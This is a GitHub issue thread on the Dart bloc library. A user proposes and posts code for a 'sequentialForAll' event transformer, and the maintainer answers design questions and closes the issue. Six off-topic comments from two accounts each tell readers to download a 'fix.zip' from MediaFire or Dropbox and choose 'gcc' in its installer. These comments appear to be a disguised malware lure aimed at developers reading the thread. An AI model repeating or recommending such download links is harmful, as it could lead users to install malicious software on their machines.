### ISSUE TITLE
feat: sequential transformer for all events

### ISSUE THREAD

**Issue by raspberry-jenshen** [felangel/bloc#4235]
**Description**

Hello!
Thanks for your awesome package and your support!

I've faced a design issue when it's required to process all events one by one (sequentially).
The 'bloc_concurrency' provides a transformer `sequential` but it works only for one event type and not for all.

For that reason, I've created my transformer `sequentialForAll`.
Please have a look and if you think it is valuable you can add it to the library.

**Problem code example**

```
class YourBloc extends Bloc<YourEvent, YourState> {
  QABloc() : super(QAState.initial()) {
    on<TestEvent1>(_testEvent1, transformer: sequential());
    on<TestEvent2>(_testEvent2, transformer: sequential());

    add(TestEvent1());
    add(TestEvent2());
    add(TestEvent2());
  }

  Future<void> _testEvent1(
    TestEvent1 event,
    Emitter<QAState> emit,
  ) async {
    print("_testEvent1 start");
    await Future.delayed(Duration(seconds: 3));
    emit(state.copyWith(count: 5));
    print("_testEvent1 end");
  }

  Future<void> _testEvent2(
    TestEvent2 event,
    Emitter<QAState> emit,
  ) async {
    print("_testEvent2 start");
    await Future.delayed(Duration(seconds: 3));
    emit(state.copyWith(count: 6));
    print("_testEvent2 end");
  }
}
```
**Output**:
```
_testEvent1 start  //_testEvent1 and _testEvent2 are started together
_testEvent2 start
_testEvent1 end
_testEvent2 end
_testEvent2 start
_testEvent2 end
```

**My solution, `sequentialForAll` transformer**

```
import 'dart:async';

import 'package:bloc/bloc.dart';

/// Process events one at a time by maintaining a queue of added events
/// and processing the events sequentially. Merges all streams from [StreamSubscriptionsComposite]
///
/// Example:
/// ```dart
/// YourBloc() {
///    final composite = StreamSubscriptionsComposite();
///    on<TestEvent1>(_testEvent1, transformer: sequentialForAll(composite));
///    on<TestEvent2>(_testEvent2, transformer: sequentialForAll(composite));
///
///    add(TestEvent1());
///    add(TestEvent2());
///    add(TestEvent2());
/// }
///
/// Future<void> _testEvent1(
///     TestEvent1 event,
///     Emitter<YourBlocState> emit,
/// ) async {
///     print("_testEvent1 start");
///     await Future.delayed(Duration(seconds: 3));
///     emit(state.copyWith(count: 5));
///     print("_testEvent1 end");
/// }
/// ....
/// Output [sequentialForAll]:
/// _testEvent1 start
/// _testEvent1 end
/// _testEvent2 start
/// _testEvent2 end
/// _testEvent2 start
/// _testEvent2 end
/// ```
/// Output [sequential]:
/// _testEvent1 start
/// _testEvent2 start
/// _testEvent1 end
/// _testEvent2 end
/// _testEvent2 start
/// _testEvent2 end
///
/// **Note**: there is no event handler overlap and every event is guaranteed
/// to be handled in the order it was received.
EventTransformer<Event> sequentialForAll<Event>(
  StreamSubscriptionsComposite? composite,
) {
  return (events, mapper) {
    return events.transform(
      _WaitAllStreamTransformer(
        mapper,
        composite ?? StreamSubscriptionsComposite(),
      ),
    );
  };
}

class StreamSubscriptionsComposite {
  final List<StreamSubscription> _subscriptions = [];

  void add(StreamSubscription subscription) {
    _subscriptions.add(subscription);
  }

  void remove(StreamSubscription subscription) {
    _subscriptions.remove(subscription);
  }

  void pause(StreamSubscription subscription) {
    for (final value in _subscriptions) {
      value.pause();
    }
  }

  void resume(StreamSubscription subscription) {
    for (final value in _subscriptions) {
      value.resume();
    }
  }
}

class _WaitAllStreamTransformer<T> extends StreamTransformerBase<T, T> {
  final EventMapper<T> mapper;
  final StreamSubscriptionsComposite composite;

  _WaitAllStreamTransformer(this.mapper, this.composite);

  @override
  Stream<T> bind(Stream<T> stream) {
    late StreamSubscription<T> subscription;
    StreamSubscription<T>? mappedSubscription;

    final controller = StreamController<T>(
      onCancel: () async {
        await mappedSubscription?.cancel();
        await subscription.cancel();
        composite.remove(subscription);
      },
      sync: true,
    );

    subscription = stream.listen(
      (data) {
        composite.pause(subscription);
        mappedSubscription = mapper(data).listen(
          controller.add,
          onError: controller.addError,
          onDone: () {
            mappedSubscription = null;
            composite.resume(subscription);
          },
        );
      },
      onError: controller.addError,
      // close [controller] if last event
      onDone: () => mappedSubscription ?? controller.close(),
    );
    composite.add(subscription);
    return controller.stream;
  }
}
```

**Comment by felangel** [comment]
Hi @raspberry-jenshen 👋 
Thanks for opening an issue!

Generally, if you want all events to use a single transformer, then I recommend using a single event handler instead like:

```
on<TestEvent>(_onEvent, transformer: sequential());

Future<void> _onEvent(TestEvent event, Emitter<QAState> emit) async {
  // handle all events
}
```

Hope that helps!

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by muhammadkamel** [comment]
@felangel 
What if I want to use transformer for specific events, while I am using Pattern matching with sealed classes & final classes like the below example:

class AuthBloc extends Bloc<AuthEvent, AuthState> {
  final RequestRegistrationCommand requestRegistration;
  final GetUserTokenQuery getUserToken;
  final UserLogoutQuery userLogout;
  final GetUserQuery getUser;
  AuthBloc({
    required this.requestRegistration,
    required this.getUserToken,
    required this.userLogout,
    required this.getUser,
  }) : super(AuthInitial()) {
    on<AuthEvent>(
      _onEvent,
    );
  }

  FutureOr<void> _onEvent(AuthEvent event, Emitter<AuthState> emit) {
    return switch (event) {
      final Login e => _loginHandler(e, emit),
      final Register e => _registerHandler(e, emit),
      final Logout e => _logoutHandler(e, emit),
      final LoginAsAnonymous e => _loginAsAnonymousHandler(e, emit),
    };
  }

**Comment by felangel** [comment]
> @felangel What if I want to use transformer for specific events, while I am using Pattern matching with sealed classes & final classes like the below example:
> 
> ```
> class AuthBloc extends Bloc<AuthEvent, AuthState> {
>   final RequestRegistrationCommand requestRegistration;
>   final GetUserTokenQuery getUserToken;
>   final UserLogoutQuery userLogout;
>   final GetUserQuery getUser;
>   AuthBloc({
>     required this.requestRegistration,
>     required this.getUserToken,
>     required this.userLogout,
>     required this.getUser,
>   }) : super(AuthInitial()) {
>     on<AuthEvent>(
>       _onEvent,
>     );
>   }
> 
>   FutureOr<void> _onEvent(AuthEvent event, Emitter<AuthState> emit) {
>     return switch (event) {
>       final Login e => _loginHandler(e, emit),
>       final Register e => _registerHandler(e, emit),
>       final Logout e => _logoutHandler(e, emit),
>       final LoginAsAnonymous e => _loginAsAnonymousHandler(e, emit),
>     };
>   }
> ```

Then you can either write your own transformer or bucket the events and use separate event handlers.

**Comment by felangel** [comment]
Closing for now but happy to continue the discussion if you have any additional feedback or questions 👍
